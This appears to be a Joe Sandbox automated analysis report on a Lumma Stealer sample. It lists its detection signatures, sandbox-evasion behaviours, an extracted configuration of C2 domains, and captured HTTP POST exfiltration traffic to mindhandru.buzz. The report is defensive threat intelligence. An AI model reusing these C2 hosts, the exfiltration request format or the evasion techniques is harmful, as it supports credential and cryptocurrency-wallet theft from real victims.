Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cFLK1CiiNK.exe

Overview

General Information

Sample name:cFLK1CiiNK.exe
renamed because original name is a hash value
Original sample name:a95fc73c07c7d57256de64b06e73a6cd.exe
Analysis ID:1581235
MD5:a95fc73c07c7d57256de64b06e73a6cd
SHA1:b5b823520691853414948ed9b962e3cf886b868c
SHA256:540319216f35894c8d8252208fb9d8aa9414f9805d7ce0bf3c674c0dfafedb4c
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cFLK1CiiNK.exe (PID: 3592 cmdline: "C:\Users\user\Desktop\cFLK1CiiNK.exe" MD5: A95FC73C07C7D57256DE64B06E73A6CD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1401111547.00000000016E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: cFLK1CiiNK.exe PID: 3592JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: cFLK1CiiNK.exe PID: 3592JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: cFLK1CiiNK.exe PID: 3592JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:56:44.521401+010020283713Unknown Traffic192.168.2.749699172.67.165.185443TCP
                2024-12-27T08:56:46.514354+010020283713Unknown Traffic192.168.2.749700172.67.165.185443TCP
                2024-12-27T08:56:49.148046+010020283713Unknown Traffic192.168.2.749701172.67.165.185443TCP
                2024-12-27T08:56:51.390512+010020283713Unknown Traffic192.168.2.749703172.67.165.185443TCP
                2024-12-27T08:56:53.681437+010020283713Unknown Traffic192.168.2.749709172.67.165.185443TCP
                2024-12-27T08:56:56.621880+010020283713Unknown Traffic192.168.2.749715172.67.165.185443TCP
                2024-12-27T08:56:59.258103+010020283713Unknown Traffic192.168.2.749723172.67.165.185443TCP
                2024-12-27T08:57:03.029746+010020283713Unknown Traffic192.168.2.749736172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:56:45.229985+010020546531A Network Trojan was detected192.168.2.749699172.67.165.185443TCP
                2024-12-27T08:56:47.295254+010020546531A Network Trojan was detected192.168.2.749700172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:56:45.229985+010020498361A Network Trojan was detected192.168.2.749699172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:56:47.295254+010020498121A Network Trojan was detected192.168.2.749700172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:56:57.398383+010020480941Malware Command and Control Activity Detected192.168.2.749715172.67.165.185443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: cFLK1CiiNK.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz/tsAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/;Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/kAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz:443/apizAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/mmAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apibAvira URL Cloud: Label: malware
                Found malware configuration
                Source: cFLK1CiiNK.exe.3592.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: cFLK1CiiNK.exeReversingLabs: Detection: 57%
                Source: cFLK1CiiNK.exeVirustotal: Detection: 53%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: cFLK1CiiNK.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: cFLK1CiiNK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49723 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49715 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.165.185:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49736 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PNPROZ0RYUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12796Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EDFZHD0QP9Z0339User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G4BWS4NU6UPZBKOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20383Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=28X9CBWLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1159Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NQADJPVE510BPDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552698Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1324894763.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1401111547.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1400622014.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480579154.0000000001716000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/;
                Source: cFLK1CiiNK.exe, 00000000.00000003.1371685116.0000000005D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apib
                Source: cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
                Source: cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/k
                Source: cFLK1CiiNK.exe, 00000000.00000003.1324752204.00000000016A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/mm
                Source: cFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: cFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ts
                Source: cFLK1CiiNK.exe, 00000000.00000002.1484422809.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1442422069.0000000005D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: cFLK1CiiNK.exe, 00000000.00000003.1480579154.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424818548.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482554233.000000000171F000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apiz
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
